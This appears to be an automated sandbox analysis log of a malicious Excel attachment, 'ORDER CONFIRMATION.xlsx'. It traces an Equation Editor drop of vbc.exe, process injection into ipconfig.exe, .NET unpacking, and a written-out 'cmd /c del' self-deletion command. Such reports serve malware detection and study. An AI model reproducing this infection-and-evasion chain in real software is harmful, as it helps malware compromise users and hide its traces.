      Source: C:\Users\Public\vbc.exeCode function: 8_2_00A9905A
      Source: C:\Users\Public\vbc.exeCode function: 8_2_00A7E2E9
      Source: C:\Users\Public\vbc.exeCode function: 8_2_00B21238
      Source: C:\Users\Public\vbc.exeCode function: 8_2_00A7F3CF
      Source: C:\Users\Public\vbc.exeCode function: 8_2_00AA63DB
      Source: C:\Users\Public\vbc.exeCode function: 8_2_00A82305
      Source: C:\Users\Public\vbc.exeCode function: 8_2_00ACA37B
      Source: C:\Users\Public\vbc.exeCode function: 8_2_00A87353
      Source: C:\Users\Public\vbc.exeCode function: 8_2_00A91489
      Source: C:\Users\Public\vbc.exeCode function: 8_2_00AB5485
      Source: C:\Users\Public\vbc.exeCode function: 8_2_00A9C5F0
      Source: C:\Users\Public\vbc.exeCode function: 8_2_00A8351F
      Source: C:\Users\Public\vbc.exeCode function: 8_2_00A84680
      Source: C:\Users\Public\vbc.exeCode function: 8_2_00A8E6C1
      Source: C:\Users\Public\vbc.exeCode function: 8_2_00B22622
      Source: C:\Users\Public\vbc.exeCode function: 8_2_00A8C7BC
      Source: C:\Users\Public\vbc.exeCode function: 8_2_00B0579A
      Source: C:\Users\Public\vbc.exeCode function: 8_2_00AB57C3
      Source: C:\Users\Public\vbc.exeCode function: 8_2_00B1F8EE
      Source: C:\Users\Public\vbc.exeCode function: 8_2_00AA286D
      Source: C:\Users\Public\vbc.exeCode function: 8_2_00A8C85C
      Source: C:\Users\Public\vbc.exeCode function: 8_2_00A829B2
      Source: C:\Users\Public\vbc.exeCode function: 8_2_00B2098E
      Source: C:\Users\Public\vbc.exeCode function: 8_2_00A969FE
      Source: C:\Users\Public\vbc.exeCode function: 8_2_00B05955
      Source: C:\Users\Public\vbc.exeCode function: 8_2_00B33A83
      Source: C:\Users\Public\vbc.exeCode function: 8_2_00B2CBA4
      Source: C:\Users\Public\vbc.exeCode function: 8_2_00B0DBDA
      Source: C:\Users\Public\vbc.exeCode function: 8_2_00A7FBD7
      Source: C:\Users\Public\vbc.exeCode function: 8_2_00AA7B00
      Source: C:\Users\Public\vbc.exeCode function: 8_2_00B1FDDD
      Source: C:\Users\Public\vbc.exeCode function: 8_2_00AB0D3B
      Source: C:\Users\Public\vbc.exeCode function: 8_2_00A8CD5B
      Source: C:\Users\Public\vbc.exeCode function: 8_2_00AB2E2F
      Source: C:\Users\Public\vbc.exeCode function: 8_2_00A9EE4C
      Source: C:\Users\Public\vbc.exeCode function: 8_2_00A90F3F
      Source: C:\Users\Public\vbc.exeCode function: 8_2_00AADF7C
      Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 11_2_01F4E0C6
      Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 11_2_01F6905A
      Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 11_2_01F53040
      Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 11_2_01F7D005
      Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 11_2_01F763DB
      Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 11_2_01F4F3CF
      Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 11_2_01F9A37B
      Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 11_2_01F57353
      Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 11_2_01F52305
      Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 11_2_01F4E2E9
      Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 11_2_01FF1238
      Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 11_2_01F6C5F0
      Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 11_2_01F5351F
      Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 11_2_01F85485
      Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 11_2_01F61489
      Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 11_2_01F8D47D
      Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 11_2_01F857C3
      Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 11_2_01F5C7BC
      Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 11_2_01FD579A
      Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 11_2_01F5E6C1
      Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 11_2_01F54680
      Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 11_2_01FF2622
      Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 11_2_01F669FE
      Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 11_2_01F529B2
      Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 11_2_01FF098E
      Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 11_2_02003A83
      Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 11_2_01FD5955
      Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 11_2_01FEF8EE
      Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 11_2_01F7286D
      Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 11_2_01F5C85C
      Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 11_2_01F4FBD7
      Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 11_2_01FDDBDA
      Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 11_2_01FFCBA4
      Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 11_2_01F77B00
      Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 11_2_01FEFDDD
      Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 11_2_01F5CD5B
      Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 11_2_01F80D3B
      Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 11_2_01F7DF7C
      Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 11_2_01F60F3F
      Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 11_2_01F6EE4C
      Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 11_2_01F82E2F
      Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 11_2_000DC2CA
      Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 11_2_000DC51E
      Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 11_2_000DB6D3
      Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 11_2_000DB8D6
      Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 11_2_000DCB5C
      Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 11_2_000C8C5D
      Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 11_2_000C8C60
      Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 11_2_000C2D87
      Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 11_2_000C2D90
      Source: C:\Windows\SysWOW64\ipconfig.exeCode function: String function: 01F4DF5C appears 107 times
      Source: C:\Windows\SysWOW64\ipconfig.exeCode function: String function: 01FBF970 appears 81 times
      Source: C:\Windows\SysWOW64\ipconfig.exeCode function: String function: 01F93F92 appears 108 times
      Source: C:\Windows\SysWOW64\ipconfig.exeCode function: String function: 01F9373B appears 238 times
      Source: C:\Windows\SysWOW64\ipconfig.exeCode function: String function: 01F4E2A8 appears 38 times
      Source: C:\Users\Public\vbc.exeCode function: String function: 00A7E2A8 appears 38 times
      Source: C:\Users\Public\vbc.exeCode function: String function: 00A7DF5C appears 107 times
      Source: C:\Users\Public\vbc.exeCode function: String function: 00AEF970 appears 81 times
      Source: C:\Users\Public\vbc.exeCode function: String function: 00AC373B appears 238 times
      Source: C:\Users\Public\vbc.exeCode function: String function: 00AC3F92 appears 108 times
      Source: C:\Users\Public\vbc.exeCode function: 8_2_004181C0 NtCreateFile,
      Source: C:\Users\Public\vbc.exeCode function: 8_2_00418270 NtReadFile,
      Source: C:\Users\Public\vbc.exeCode function: 8_2_004182F0 NtClose,
      Source: C:\Users\Public\vbc.exeCode function: 8_2_004183A0 NtAllocateVirtualMemory,
      Source: C:\Users\Public\vbc.exeCode function: 8_2_0041839A NtAllocateVirtualMemory,
      Source: C:\Users\Public\vbc.exeCode function: 8_2_00A700C4 NtCreateFile,LdrInitializeThunk,
      Source: C:\Users\Public\vbc.exeCode function: 8_2_00A70078 NtResumeThread,LdrInitializeThunk,
      Source: C:\Users\Public\vbc.exeCode function: 8_2_00A70048 NtProtectVirtualMemory,LdrInitializeThunk,
      Source: C:\Users\Public\vbc.exeCode function: 8_2_00A707AC NtCreateMutant,LdrInitializeThunk,
      Source: C:\Users\Public\vbc.exeCode function: 8_2_00A6F9F0 NtClose,LdrInitializeThunk,
      Source: C:\Users\Public\vbc.exeCode function: 8_2_00A6F900 NtReadFile,LdrInitializeThunk,
      Source: C:\Users\Public\vbc.exeCode function: 8_2_00A6FAE8 NtQueryInformationProcess,LdrInitializeThunk,
      Source: C:\Users\Public\vbc.exeCode function: 8_2_00A6FAD0 NtAllocateVirtualMemory,LdrInitializeThunk,
      Source: C:\Users\Public\vbc.exeCode function: 8_2_00A6FBB8 NtQueryInformationToken,LdrInitializeThunk,
      Source: C:\Users\Public\vbc.exeCode function: 8_2_00A6FB68 NtFreeVirtualMemory,LdrInitializeThunk,
      Source: C:\Users\Public\vbc.exeCode function: 8_2_00A6FC90 NtUnmapViewOfSection,LdrInitializeThunk,
      Source: C:\Users\Public\vbc.exeCode function: 8_2_00A6FC60 NtMapViewOfSection,LdrInitializeThunk,
      Source: C:\Users\Public\vbc.exeCode function: 8_2_00A6FD8C NtDelayExecution,LdrInitializeThunk,
      Source: C:\Users\Public\vbc.exeCode function: 8_2_00A6FDC0 NtQuerySystemInformation,LdrInitializeThunk,
      Source: C:\Users\Public\vbc.exeCode function: 8_2_00A6FEA0 NtReadVirtualMemory,LdrInitializeThunk,
      Source: C:\Users\Public\vbc.exeCode function: 8_2_00A6FED0 NtAdjustPrivilegesToken,LdrInitializeThunk,
      Source: C:\Users\Public\vbc.exeCode function: 8_2_00A6FFB4 NtCreateSection,LdrInitializeThunk,
      Source: C:\Users\Public\vbc.exeCode function: 8_2_00A710D0 NtOpenProcessToken,
      Source: C:\Users\Public\vbc.exeCode function: 8_2_00A70060 NtQuerySection,
      Source: C:\Users\Public\vbc.exeCode function: 8_2_00A701D4 NtSetValueKey,
      Source: C:\Users\Public\vbc.exeCode function: 8_2_00A7010C NtOpenDirectoryObject,
      Source: C:\Users\Public\vbc.exeCode function: 8_2_00A71148 NtOpenThread,
      Source: C:\Users\Public\vbc.exeCode function: 8_2_00A6F8CC NtWaitForSingleObject,
      Source: C:\Users\Public\vbc.exeCode function: 8_2_00A71930 NtSetContextThread,
      Source: C:\Users\Public\vbc.exeCode function: 8_2_00A6F938 NtWriteFile,
      Source: C:\Users\Public\vbc.exeCode function: 8_2_00A6FAB8 NtQueryValueKey,
      Source: C:\Users\Public\vbc.exeCode function: 8_2_00A6FA20 NtQueryInformationFile,
      Source: C:\Users\Public\vbc.exeCode function: 8_2_00A6FA50 NtEnumerateValueKey,
      Source: C:\Users\Public\vbc.exeCode function: 8_2_00A6FBE8 NtQueryVirtualMemory,
      Source: C:\Users\Public\vbc.exeCode function: 8_2_00A6FB50 NtCreateKey,
      Source: C:\Users\Public\vbc.exeCode function: 8_2_00A6FC30 NtOpenProcess,
      Source: C:\Users\Public\vbc.exeCode function: 8_2_00A70C40 NtGetContextThread,
      Source: C:\Users\Public\vbc.exeCode function: 8_2_00A6FC48 NtSetInformationFile,
      Source: C:\Users\Public\vbc.exeCode function: 8_2_00A71D80 NtSuspendThread,
      Source: C:\Users\Public\vbc.exeCode function: 8_2_00A6FD5C NtEnumerateKey,
      Source: C:\Users\Public\vbc.exeCode function: 8_2_00A6FE24 NtWriteVirtualMemory,
      Source: C:\Users\Public\vbc.exeCode function: 8_2_00A6FFFC NtCreateProcessEx,
      Source: C:\Users\Public\vbc.exeCode function: 8_2_00A6FF34 NtQueueApcThread,
      Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 11_2_01F400C4 NtCreateFile,LdrInitializeThunk,
      Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 11_2_01F407AC NtCreateMutant,LdrInitializeThunk,
      Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 11_2_01F3F9F0 NtClose,LdrInitializeThunk,
      Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 11_2_01F3F900 NtReadFile,LdrInitializeThunk,
      Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 11_2_01F3FBB8 NtQueryInformationToken,LdrInitializeThunk,
      Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 11_2_01F3FB68 NtFreeVirtualMemory,LdrInitializeThunk,
      Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 11_2_01F3FB50 NtCreateKey,LdrInitializeThunk,
      Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 11_2_01F3FAE8 NtQueryInformationProcess,LdrInitializeThunk,
      Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 11_2_01F3FDC0 NtQuerySystemInformation,LdrInitializeThunk,
      Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 11_2_01F3FD8C NtDelayExecution,LdrInitializeThunk,
      Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 11_2_01F3FC60 NtMapViewOfSection,LdrInitializeThunk,
      Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 11_2_01F3FFB4 NtCreateSection,LdrInitializeThunk,
      Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 11_2_01F3FED0 NtAdjustPrivilegesToken,LdrInitializeThunk,
      Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 11_2_01F401D4 NtSetValueKey,
      Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 11_2_01F41148 NtOpenThread,
      Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 11_2_01F4010C NtOpenDirectoryObject,
      Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 11_2_01F410D0 NtOpenProcessToken,
      Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 11_2_01F40078 NtResumeThread,
      Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 11_2_01F40060 NtQuerySection,
      Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 11_2_01F40048 NtProtectVirtualMemory,
      Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 11_2_01F41930 NtSetContextThread,
      Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 11_2_01F3F938 NtWriteFile,
      Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 11_2_01F3F8CC NtWaitForSingleObject,
      Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 11_2_01F3FBE8 NtQueryVirtualMemory,
      Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 11_2_01F3FAD0 NtAllocateVirtualMemory,
      Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 11_2_01F3FAB8 NtQueryValueKey,
      Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 11_2_01F3FA50 NtEnumerateValueKey,
      Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 11_2_01F3FA20 NtQueryInformationFile,
      Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 11_2_01F41D80 NtSuspendThread,
      Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 11_2_01F3FD5C NtEnumerateKey,
      Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 11_2_01F3FC90 NtUnmapViewOfSection,
      Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 11_2_01F40C40 NtGetContextThread,
      Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 11_2_01F3FC48 NtSetInformationFile,
      Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 11_2_01F3FC30 NtOpenProcess,
      Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 11_2_01F3FFFC NtCreateProcessEx,
      Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 11_2_01F3FF34 NtQueueApcThread,
      Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 11_2_01F3FEA0 NtReadVirtualMemory,
      Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 11_2_01F3FE24 NtWriteVirtualMemory,
      Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 11_2_000D81C0 NtCreateFile,
      Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 11_2_000D8270 NtReadFile,
      Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 11_2_000D82F0 NtClose,
      Source: C:\Windows\explorer.exeProcess Stats: CPU usage > 98%
      Source: C:\Windows\SysWOW64\ipconfig.exeProcess Stats: CPU usage > 98%
      Source: C:\Users\Public\vbc.exeMemory allocated: 76F90000 page execute and read and write
      Source: C:\Users\Public\vbc.exeMemory allocated: 76E90000 page execute and read and write
      Source: C:\Users\Public\vbc.exeMemory allocated: 76F90000 page execute and read and write
      Source: C:\Users\Public\vbc.exeMemory allocated: 76E90000 page execute and read and write
      Source: vbc[1].exe.4.drStatic PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
      Source: vbc.exe.4.drStatic PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
      Source: ORDER CONFIRMATION.xlsxVirustotal: Detection: 32%
      Source: ORDER CONFIRMATION.xlsxReversingLabs: Detection: 29%
      Source: C:\Users\Public\vbc.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
      Source: unknownProcess created: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE 'C:\Program Files\Microsoft Office\Office14\EXCEL.EXE' /automation -Embedding
      Source: unknownProcess created: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE 'C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE' -Embedding
      Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess created: C:\Users\Public\vbc.exe 'C:\Users\Public\vbc.exe'
      Source: C:\Users\Public\vbc.exeProcess created: C:\Users\Public\vbc.exe C:\Users\Public\vbc.exe
      Source: C:\Users\Public\vbc.exeProcess created: C:\Users\Public\vbc.exe C:\Users\Public\vbc.exe
      Source: C:\Users\Public\vbc.exeProcess created: C:\Windows\SysWOW64\ipconfig.exe C:\Windows\SysWOW64\ipconfig.exe
      Source: C:\Windows\SysWOW64\ipconfig.exeProcess created: C:\Windows\SysWOW64\cmd.exe /c del 'C:\Users\Public\vbc.exe'
      Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess created: C:\Users\Public\vbc.exe 'C:\Users\Public\vbc.exe'
      Source: C:\Users\Public\vbc.exeProcess created: C:\Users\Public\vbc.exe C:\Users\Public\vbc.exe
      Source: C:\Users\Public\vbc.exeProcess created: C:\Users\Public\vbc.exe C:\Users\Public\vbc.exe
      Source: C:\Users\Public\vbc.exeProcess created: C:\Windows\SysWOW64\ipconfig.exe C:\Windows\SysWOW64\ipconfig.exe
      Source: C:\Windows\SysWOW64\ipconfig.exeProcess created: C:\Windows\SysWOW64\cmd.exe /c del 'C:\Users\Public\vbc.exe'
      Source: C:\Windows\explorer.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{B196B286-BAB4-101A-B69C-00AA00341D07}\InprocServer32
      Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile created: C:\Users\user\Desktop\~$ORDER CONFIRMATION.xlsxJump to behavior
      Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile created: C:\Users\user\AppData\Local\Temp\CVRF298.tmpJump to behavior
      Source: classification engineClassification label: mal100.troj.expl.evad.winXLSX@12/19@22/4
      Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile read: C:\Users\desktop.iniJump to behavior
      Source: C:\Users\Public\vbc.exeSection loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\7582400666d289c016013ad0f6e0e3e6\mscorlib.ni.dll
      Source: explorer.exe, 00000009.00000000.502008099.0000000002AE0000.00000002.00020000.sdmpBinary or memory string: .VBPud<_
      Source: vbc[1].exe.4.dr, Forms/mainForm.csCryptographic APIs: 'TransformFinalBlock', 'CreateDecryptor'
      Source: vbc.exe.4.dr, Forms/mainForm.csCryptographic APIs: 'TransformFinalBlock', 'CreateDecryptor'
      Source: 6.0.vbc.exe.200000.0.unpack, Forms/mainForm.csCryptographic APIs: 'TransformFinalBlock', 'CreateDecryptor'
      Source: 6.2.vbc.exe.200000.0.unpack, Forms/mainForm.csCryptographic APIs: 'TransformFinalBlock', 'CreateDecryptor'
      Source: 7.2.vbc.exe.200000.0.unpack, Forms/mainForm.csCryptographic APIs: 'TransformFinalBlock', 'CreateDecryptor'
      Source: 7.0.vbc.exe.200000.0.unpack, Forms/mainForm.csCryptographic APIs: 'TransformFinalBlock', 'CreateDecryptor'
      Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
      Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
      Source: C:\Windows\explorer.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
      Source: Window RecorderWindow detected: More than 3 window changes detected
      Source: C:\Users\Public\vbc.exeFile opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dll
      Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEKey opened: HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\Resiliency\StartupItems
      Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile opened: C:\Windows\WinSxS\amd64_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_08e4299fa83d7e3c\MSVCR90.dll
      Source: Binary string: ipconfig.pdb source: vbc.exe, 00000008.00000002.540860003.0000000000030000.00000040.00020000.sdmp
      Source: Binary string: ipconfig.pdbN source: vbc.exe, 00000008.00000002.540860003.0000000000030000.00000040.00020000.sdmp
      Source: Binary string: wntdll.pdb source: vbc.exe, ipconfig.exe

      Data Obfuscation:

      barindex
      .NET source code contains potential unpackerShow sources
      Source: vbc[1].exe.4.dr, Forms/mainForm.cs.Net Code: _X_X0FT_FT2 System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
      Source: vbc.exe.4.dr, Forms/mainForm.cs.Net Code: _X_X0FT_FT2 System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
      Source: 6.0.vbc.exe.200000.0.unpack, Forms/mainForm.cs.Net Code: _X_X0FT_FT2 System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
      Source: 6.2.vbc.exe.200000.0.unpack, Forms/mainForm.cs.Net Code: _X_X0FT_FT2 System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
      Source: 7.2.vbc.exe.200000.0.unpack, Forms/mainForm.cs.Net Code: _X_X0FT_FT2 System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
      Source: 7.0.vbc.exe.200000.0.unpack, Forms/mainForm.cs.Net Code: _X_X0FT_FT2 System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
      Source: 8.2.vbc.exe.200000.1.unpack, Forms/mainForm.cs.Net Code: _X_X0FT_FT2 System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
      Source: 8.0.vbc.exe.200000.0.unpack, Forms/mainForm.cs.Net Code: _X_X0FT_FT2 System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
      Source: C:\Users\Public\vbc.exeCode function: 6_2_001E4D58 push esp; ret
      Source: C:\Users\Public\vbc.exeCode function: 6_2_001E879A push edx; retf
      Source: C:\Users\Public\vbc.exeCode function: 6_2_001E87CE push ds; retf
      Source: C:\Users\Public\vbc.exeCode function: 8_2_00415080 push esi; ret
      Source: C:\Users\Public\vbc.exeCode function: 8_2_00416235 push edi; iretd
      Source: C:\Users\Public\vbc.exeCode function: 8_2_0041B3B5 push eax; ret
      Source: C:\Users\Public\vbc.exeCode function: 8_2_0041B46C push eax; ret
      Source: C:\Users\Public\vbc.exeCode function: 8_2_0041B402 push eax; ret
      Source: C:\Users\Public\vbc.exeCode function: 8_2_0041B40B push eax; ret
      Source: C:\Users\Public\vbc.exeCode function: 8_2_00A7DFA1 push ecx; ret
      Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 11_2_01F4DFA1 push ecx; ret
      Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 11_2_000D5080 push esi; ret
      Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 11_2_000D6235 push edi; iretd
      Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 11_2_000DB3B5 push eax; ret
      Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 11_2_000DB40B push eax; ret
      Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 11_2_000DB402 push eax; ret
      Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 11_2_000DB46C push eax; ret
      Source: vbc[1].exe.4.drStatic PE information: 0x82CF36F5 [Mon Jul 18 16:08:21 2039 UTC]
      Source: initial sampleStatic PE information: section name: .text entropy: 7.19334150193
      Source: initial sampleStatic PE information: section name: .text entropy: 7.19334150193

      Persistence and Installation Behavior:

      barindex
      Uses ipconfig to lookup or modify the Windows network settingsShow sources
      Source: C:\Users\Public\vbc.exeProcess created: C:\Windows\SysWOW64\ipconfig.exe C:\Windows\SysWOW64\ipconfig.exe
      Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEFile created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\vbc[1].exeJump to dropped file
      Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEFile created: C:\Users\Public\vbc.exeJump to dropped file
      Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEFile created: C:\Users\Public\vbc.exeJump to dropped file

      Boot Survival:

      barindex
      Drops PE files to the user root directoryShow sources
      Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEFile created: C:\Users\Public\vbc.exeJump to dropped file
      Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
      Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
      Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
      Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
      Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
      Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
      Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
      Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
      Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
      Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
      Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess information set: NOOPENFILEERRORBOX
      Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess information set: NOOPENFILEERRORBOX
      Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess information set: NOOPENFILEERRORBOX
      Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess information set: NOOPENFILEERRORBOX
      Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess information set: NOOPENFILEERRORBOX
      Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess information set: NOOPENFILEERRORBOX
      Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess information set: NOOPENFILEERRORBOX
      Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess information set: NOOPENFILEERRORBOX
      Source: C:\Users\Public\vbc.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Users\Public\vbc.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Users\Public\vbc.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Users\Public\vbc.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Users\Public\vbc.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Users\Public\vbc.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Users\Public\vbc.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Users\Public\vbc.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Users\Public\vbc.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Users\Public\vbc.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Users\Public\vbc.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Users\Public\vbc.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Users\Public\vbc.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Users\Public\vbc.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Users\Public\vbc.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Users\Public\vbc.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Users\Public\vbc.exeProcess information set: NOOPENFILEERRORBOX
